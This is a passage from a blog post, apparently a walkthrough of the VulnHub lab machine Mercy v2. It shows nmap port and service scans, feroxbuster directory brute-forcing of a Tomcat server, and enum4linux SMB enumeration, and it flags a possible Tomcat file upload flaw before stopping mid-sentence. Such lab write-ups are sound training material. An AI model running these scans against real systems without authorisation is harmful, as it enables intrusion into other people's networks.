{"id":462,"date":"2024-03-25T14:01:36","date_gmt":"2024-03-25T06:01:36","guid":{"rendered":"http:\/\/162.14.82.114\/?p=462"},"modified":"2024-03-25T14:01:36","modified_gmt":"2024-03-25T06:01:36","slug":"vulnhub-digitalworld-local-mercy-v2","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/462\/03\/25\/2024\/","title":{"rendered":"Vulnhub&#8211;DIGITALWORLD.LOCAL: MERCY V2"},"content":{"rendered":"<h1>DIGITALWORLD.LOCAL: MERCY V2<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401760.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401760.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240324122938725\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401763.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401763.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240325120829697\" style=\"zoom: 50%;\" 
\/><\/div><\/p>\n<h2>Information Gathering<\/h2>\n<h3>Port Scanning<\/h3>\n<p>Scan the ports:<\/p>\n<pre><code class=\"language-bash\">sudo nmap -sS 192.168.37.132<\/code><\/pre>\n<pre><code class=\"language-apl\">PORT     STATE    SERVICE\n22\/tcp   filtered ssh\n53\/tcp   open     domain\n80\/tcp   filtered http\n110\/tcp  open     pop3\n139\/tcp  open     netbios-ssn\n143\/tcp  open     imap\n445\/tcp  open     microsoft-ds\n993\/tcp  open     imaps\n995\/tcp  open     pop3s\n8080\/tcp open     http-proxy\nMAC Address: 00:0C:29:73:16:69 (VMware)<\/code><\/pre>\n<pre><code class=\"language-bash\">nmap -sCV 192.168.37.132<\/code><\/pre>\n<pre><code class=\"language-text\">PORT     STATE SERVICE     VERSION\n53\/tcp   open  domain      ISC BIND 9.9.5-3ubuntu0.17 (Ubuntu Linux)\n| dns-nsid: \n|_  bind.version: 9.9.5-3ubuntu0.17-Ubuntu\n110\/tcp  open  pop3?\n| ssl-cert: Subject: commonName=localhost\/organizationName=Dovecot mail server\n| Not valid before: 2018-08-24T13:22:55\n|_Not valid after:  2028-08-23T13:22:55\n|_ssl-date: TLS randomness does not represent time\n139\/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)\n143\/tcp  open  imap        Dovecot imapd\n| ssl-cert: Subject: commonName=localhost\/organizationName=Dovecot mail server\n| Not valid before: 2018-08-24T13:22:55\n|_Not valid after:  2028-08-23T13:22:55\n|_ssl-date: TLS randomness does not represent time\n445\/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)\n993\/tcp  open  ssl\/imap    Dovecot imapd\n|_ssl-date: TLS randomness does not represent time\n| ssl-cert: Subject: commonName=localhost\/organizationName=Dovecot mail server\n| Not valid before: 2018-08-24T13:22:55\n|_Not valid after:  2028-08-23T13:22:55\n995\/tcp  open  ssl\/pop3s?\n| ssl-cert: Subject: commonName=localhost\/organizationName=Dovecot mail server\n| Not valid before: 2018-08-24T13:22:55\n|_Not valid after:  2028-08-23T13:22:55\n|_ssl-date: 
TLS randomness does not represent time\n8080\/tcp open  http        Apache Tomcat\/Coyote JSP engine 1.1\n| http-robots.txt: 1 disallowed entry \n|_\/tryharder\/tryharder\n|_http-open-proxy: Proxy might be redirecting requests\n|_http-title: Apache Tomcat\n| http-methods: \n|_  Potentially risky methods: PUT DELETE\n|_http-server-header: Apache-Coyote\/1.1\nService Info: Host: MERCY; OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nHost script results:\n| smb2-time: \n|   date: 2024-03-25T04:12:55\n|_  start_date: N\/A\n| smb-security-mode: \n|   account_used: guest\n|   authentication_level: user\n|   challenge_response: supported\n|_  message_signing: disabled (dangerous, but default)\n|_nbstat: NetBIOS name: MERCY, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: &lt;unknown&gt; (unknown)\n| smb2-security-mode: \n|   3:1:1: \n|_    Message signing enabled but not required\n| smb-os-discovery: \n|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)\n|   Computer name: mercy\n|   NetBIOS computer name: MERCY\\x00\n|   Domain name: \\x00\n|   FQDN: mercy\n|_  System time: 2024-03-25T12:12:55+08:00\n|_clock-skew: mean: -2h39m59s, deviation: 4h37m07s, median: 0s<\/code><\/pre>\n<h3>Directory Scanning<\/h3>\n<pre><code>feroxbuster -u http:\/\/192.168.37.132<\/code><\/pre>\n<blockquote>\n<p>=&gt; error sending request for url (<a href=\"http:\/\/192.168.37.132\/\">http:\/\/192.168.37.132\/<\/a>): error trying to connect: tcp connect error: Connection refused (os error 111)                                                           ERROR: Could not connect to any target provided <\/p>\n<p>This means the port is filtered; the nmap scan reported it as <code>filtered<\/code>.<\/p>\n<\/blockquote>\n<pre><code class=\"language-bash\">feroxbuster -u http:\/\/192.168.37.132:8080<\/code><\/pre>\n<pre><code class=\"language-text\">404      GET        1l       46w      989c http:\/\/192.168.37.132:8080\/tryharder\/\n200      GET        1l        1w      621c 
http:\/\/192.168.37.132:8080\/tryharder\/tryharder\n404      GET        1l       46w        -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/docs =&gt; http:\/\/192.168.37.132:8080\/docs\/\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/manager =&gt; http:\/\/192.168.37.132:8080\/manager\/\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/examples =&gt; http:\/\/192.168.37.132:8080\/examples\/\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/docs\/images =&gt; http:\/\/192.168.37.132:8080\/docs\/images\/\n401      GET       64l      289w     2474c http:\/\/192.168.37.132:8080\/manager\/html\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/docs\/config =&gt; http:\/\/192.168.37.132:8080\/docs\/config\/\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/docs\/api =&gt; http:\/\/192.168.37.132:8080\/docs\/api\/\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/examples\/jsp =&gt; http:\/\/192.168.37.132:8080\/examples\/jsp\/\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/examples\/jsp\/include =&gt; http:\/\/192.168.37.132:8080\/examples\/jsp\/include\/\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/examples\/jsp\/error =&gt; http:\/\/192.168.37.132:8080\/examples\/jsp\/error\/\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/examples\/jsp\/images =&gt; http:\/\/192.168.37.132:8080\/examples\/jsp\/images\/\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/examples\/jsp\/xml =&gt; http:\/\/192.168.37.132:8080\/examples\/jsp\/xml\/\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/examples\/jsp\/chat =&gt; 
http:\/\/192.168.37.132:8080\/examples\/jsp\/chat\/\n[&gt;-------------------] - 3s      6511\/390008  3m      found:15      errors:0      \n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/examples\/servlets =&gt; http:\/\/192.168.37.132:8080\/examples\/servlets\/\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/examples\/jsp\/plugin =&gt; http:\/\/192.168.37.132:8080\/examples\/jsp\/plugin\/\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/examples\/jsp\/forward =&gt; http:\/\/192.168.37.132:8080\/examples\/jsp\/forward\/\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/examples\/servlets\/images =&gt; http:\/\/192.168.37.132:8080\/examples\/servlets\/images\/\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/examples\/jsp\/security =&gt; http:\/\/192.168.37.132:8080\/examples\/jsp\/security\/\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/examples\/jsp\/sessions =&gt; http:\/\/192.168.37.132:8080\/examples\/jsp\/sessions\/\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/host-manager\/ =&gt; http:\/\/192.168.37.132:8080\/host-manager\/html\n401      GET       54l      241w     2044c http:\/\/192.168.37.132:8080\/host-manager\/html\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/manager\/ =&gt; http:\/\/192.168.37.132:8080\/manager\/html\n200      GET       29l      211w     1895c http:\/\/192.168.37.132:8080\/\n404      GET       46l      184w        -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/examples\/jsp\/cal =&gt; http:\/\/192.168.37.132:8080\/examples\/jsp\/cal\/\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/manager\/images =&gt; http:\/\/192.168.37.132:8080\/manager\/images\/\n401      GET       64l      
289w     2474c http:\/\/192.168.37.132:8080\/manager\/text\/\n401      GET       64l      289w     2474c http:\/\/192.168.37.132:8080\/manager\/text\/css\n200      GET        5l       27w      288c http:\/\/192.168.37.132:8080\/examples\/jsp\/chat\/chat\n401      GET       64l      289w     2474c http:\/\/192.168.37.132:8080\/manager\/text\n401      GET       64l      289w     2474c http:\/\/192.168.37.132:8080\/manager\/status\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/examples\/jsp\/colors =&gt; http:\/\/192.168.37.132:8080\/examples\/jsp\/colors\/\n404      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/manager\/accounts\n404      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/manager\/unused\n404      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/manager\/tree\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/examples\/jsp\/plugin\/applet =&gt; http:\/\/192.168.37.132:8080\/examples\/jsp\/plugin\/applet\/\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/examples\/jsp\/async =&gt; http:\/\/192.168.37.132:8080\/examples\/jsp\/async\/\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/docs\/architecture =&gt; http:\/\/192.168.37.132:8080\/docs\/architecture\/\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/examples\/jsp\/dates =&gt; http:\/\/192.168.37.132:8080\/examples\/jsp\/dates\/\n200      GET       10l       19w      221c http:\/\/192.168.37.132:8080\/examples\/jsp\/j_security_check\n200      GET       10l       19w      221c http:\/\/192.168.37.132:8080\/examples\/servlets\/j_security_check\n200      GET       10l       19w      221c http:\/\/192.168.37.132:8080\/examples\/j_security_check\n200      GET       10l       19w      221c http:\/\/192.168.37.132:8080\/examples\/jsp\/error\/j_security_check\n200      GET       10l       19w      221c 
http:\/\/192.168.37.132:8080\/examples\/jsp\/images\/j_security_check\n200      GET       10l       19w      221c http:\/\/192.168.37.132:8080\/examples\/servlets\/images\/j_security_check\n200      GET       10l       19w      221c http:\/\/192.168.37.132:8080\/examples\/jsp\/plugin\/j_security_check\n200      GET       10l       19w      221c http:\/\/192.168.37.132:8080\/examples\/jsp\/security\/j_security_check\n200      GET       10l       19w      221c http:\/\/192.168.37.132:8080\/examples\/jsp\/xml\/j_security_check\n401      GET       64l      289w     2474c http:\/\/192.168.37.132:8080\/manager\/j_security_check\n200      GET       10l       19w      221c http:\/\/192.168.37.132:8080\/examples\/jsp\/forward\/j_security_check\n200      GET       10l       19w      221c http:\/\/192.168.37.132:8080\/examples\/jsp\/include\/j_security_check\n200      GET       10l       19w      221c http:\/\/192.168.37.132:8080\/examples\/jsp\/sessions\/j_security_check\n200      GET       10l       19w      221c http:\/\/192.168.37.132:8080\/examples\/jsp\/cal\/j_security_check\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/examples\/jsp\/chat\/index.jsp;jsessionid=D8AF0618B91EF30D5FF0FD4BAFEB9293 =&gt; http:\/\/192.168.37.132:8080\/examples\/jsp\/chat\/login.jsp\n200      GET       10l       19w      221c http:\/\/192.168.37.132:8080\/examples\/jsp\/chat\/j_security_check\n401      GET       64l      289w     2474c http:\/\/192.168.37.132:8080\/manager\/images\/j_security_check\n200      GET       10l       19w      221c http:\/\/192.168.37.132:8080\/examples\/jsp\/colors\/j_security_check\n404      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/manager\/ris\n200      GET       54l      198w     1689c http:\/\/192.168.37.132:8080\/examples\/jsp\/async\/index.jsp;jsessionid=0C7E29C0E0D37A8DB17EC652DB97EE01\n200      GET       10l       19w      221c http:\/\/192.168.37.132:8080\/examples\/jsp\/async\/j_security_check\n404      
GET        0l        0w        0c http:\/\/192.168.37.132:8080\/manager\/images\/TWiki\n200      GET       10l       19w      221c http:\/\/192.168.37.132:8080\/examples\/jsp\/dates\/j_security_check\n404      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/manager\/images\/how-to-order\n404      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/manager\/images\/BTrivia\n302      GET        0l        0w        0c http:\/\/192.168.37.132:8080\/docs\/architecture\/startup =&gt; http:\/\/192.168.37.132:8080\/docs\/architecture\/startup\/<\/code><\/pre>\n<p>Filter the output with awk:<\/p>\n<pre><code class=\"language-shell\">awk &#039;{print $1, $6}&#039; temp<\/code><\/pre>\n<pre><code class=\"language-text\">404 http:\/\/192.168.37.132:8080\/tryharder\/\n200 http:\/\/192.168.37.132:8080\/tryharder\/tryharder\n302 http:\/\/192.168.37.132:8080\/docs\n302 http:\/\/192.168.37.132:8080\/manager\n302 http:\/\/192.168.37.132:8080\/examples\n302 http:\/\/192.168.37.132:8080\/docs\/images\n401 http:\/\/192.168.37.132:8080\/manager\/html\n302 http:\/\/192.168.37.132:8080\/docs\/config\n302 http:\/\/192.168.37.132:8080\/docs\/api\n302 http:\/\/192.168.37.132:8080\/examples\/jsp\n302 http:\/\/192.168.37.132:8080\/examples\/jsp\/include\n302 http:\/\/192.168.37.132:8080\/examples\/jsp\/error\n302 http:\/\/192.168.37.132:8080\/examples\/jsp\/images\n302 http:\/\/192.168.37.132:8080\/examples\/jsp\/xml\n302 http:\/\/192.168.37.132:8080\/examples\/jsp\/chat\n302 http:\/\/192.168.37.132:8080\/examples\/servlets\n302 http:\/\/192.168.37.132:8080\/examples\/jsp\/plugin\n302 http:\/\/192.168.37.132:8080\/examples\/jsp\/forward\n302 http:\/\/192.168.37.132:8080\/examples\/servlets\/images\n302 http:\/\/192.168.37.132:8080\/examples\/jsp\/security\n302 http:\/\/192.168.37.132:8080\/examples\/jsp\/sessions\n302 http:\/\/192.168.37.132:8080\/host-manager\/\n401 http:\/\/192.168.37.132:8080\/host-manager\/html\n302 
http:\/\/192.168.37.132:8080\/manager\/\n200 http:\/\/192.168.37.132:8080\/\n302 http:\/\/192.168.37.132:8080\/examples\/jsp\/cal\n302 http:\/\/192.168.37.132:8080\/manager\/images\n401 http:\/\/192.168.37.132:8080\/manager\/text\/\n401 http:\/\/192.168.37.132:8080\/manager\/text\/css\n200 http:\/\/192.168.37.132:8080\/examples\/jsp\/chat\/chat\n401 http:\/\/192.168.37.132:8080\/manager\/text\n401 http:\/\/192.168.37.132:8080\/manager\/status\n302 http:\/\/192.168.37.132:8080\/examples\/jsp\/colors\n404 http:\/\/192.168.37.132:8080\/manager\/accounts\n404 http:\/\/192.168.37.132:8080\/manager\/unused\n404 http:\/\/192.168.37.132:8080\/manager\/tree\n302 http:\/\/192.168.37.132:8080\/examples\/jsp\/plugin\/applet\n302 http:\/\/192.168.37.132:8080\/examples\/jsp\/async\n302 http:\/\/192.168.37.132:8080\/docs\/architecture\n302 http:\/\/192.168.37.132:8080\/examples\/jsp\/dates\n200 http:\/\/192.168.37.132:8080\/examples\/jsp\/j_security_check\n200 http:\/\/192.168.37.132:8080\/examples\/servlets\/j_security_check\n200 http:\/\/192.168.37.132:8080\/examples\/j_security_check\n200 http:\/\/192.168.37.132:8080\/examples\/jsp\/error\/j_security_check\n200 http:\/\/192.168.37.132:8080\/examples\/jsp\/images\/j_security_check\n200 http:\/\/192.168.37.132:8080\/examples\/servlets\/images\/j_security_check\n200 http:\/\/192.168.37.132:8080\/examples\/jsp\/plugin\/j_security_check\n200 http:\/\/192.168.37.132:8080\/examples\/jsp\/security\/j_security_check\n200 http:\/\/192.168.37.132:8080\/examples\/jsp\/xml\/j_security_check\n401 http:\/\/192.168.37.132:8080\/manager\/j_security_check\n200 http:\/\/192.168.37.132:8080\/examples\/jsp\/forward\/j_security_check\n200 http:\/\/192.168.37.132:8080\/examples\/jsp\/include\/j_security_check\n200 http:\/\/192.168.37.132:8080\/examples\/jsp\/sessions\/j_security_check\n200 http:\/\/192.168.37.132:8080\/examples\/jsp\/cal\/j_security_check\n302 
http:\/\/192.168.37.132:8080\/examples\/jsp\/chat\/index.jsp;jsessionid=D8AF0618B91EF30D5FF0FD4BAFEB9293\n200 http:\/\/192.168.37.132:8080\/examples\/jsp\/chat\/j_security_check\n401 http:\/\/192.168.37.132:8080\/manager\/images\/j_security_check\n200 http:\/\/192.168.37.132:8080\/examples\/jsp\/colors\/j_security_check\n404 http:\/\/192.168.37.132:8080\/manager\/ris\n200 http:\/\/192.168.37.132:8080\/examples\/jsp\/async\/index.jsp;jsessionid=0C7E29C0E0D37A8DB17EC652DB97EE01\n200 http:\/\/192.168.37.132:8080\/examples\/jsp\/async\/j_security_check\n404 http:\/\/192.168.37.132:8080\/manager\/images\/TWiki\n200 http:\/\/192.168.37.132:8080\/examples\/jsp\/dates\/j_security_check\n404 http:\/\/192.168.37.132:8080\/manager\/images\/how-to-order\n404 http:\/\/192.168.37.132:8080\/manager\/images\/BTrivia\n302 http:\/\/192.168.37.132:8080\/docs\/architecture\/startup<\/code><\/pre>\n<p>The page content is as follows:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401764.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401764.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240325121824227\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>Exploitation<\/h2>\n<h3>Sensitive Directory Discovery<\/h3>\n<p>Following the address shown on the home page, try to visit it:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401766.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401766.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240325123217162\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401767.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401767.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240325123354703\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401768.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401768.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240325123435438\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401769.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401769.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240325123449030\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h4>Vulnerability Information Gathering<\/h4>\n<p>Found <code>tomcat<\/code> version <code>7.0.52<\/code>; check whether there are any related vulnerabilities:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401770.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401770.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240325123630137\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<p>Found a file upload vulnerability that may come in handy later; look at other things first.<\/p>\n<h3>Port Information Gathering<\/h3>\n<h4>SMB Service Enumeration<\/h4>\n<p>Port <code>445<\/code> is open, so try enumerating it:<\/p>\n<p>First, scan it with <code>enum4linux<\/code>:<\/p>\n<pre><code class=\"language-bash\">enum4linux 192.168.37.132<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401771.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401771.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240325124824854\" style=\"zoom: 50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401772.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401772.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240325124846078\" style=\"zoom: 50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401773.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401773.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240325125025195\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Found four users and one shared 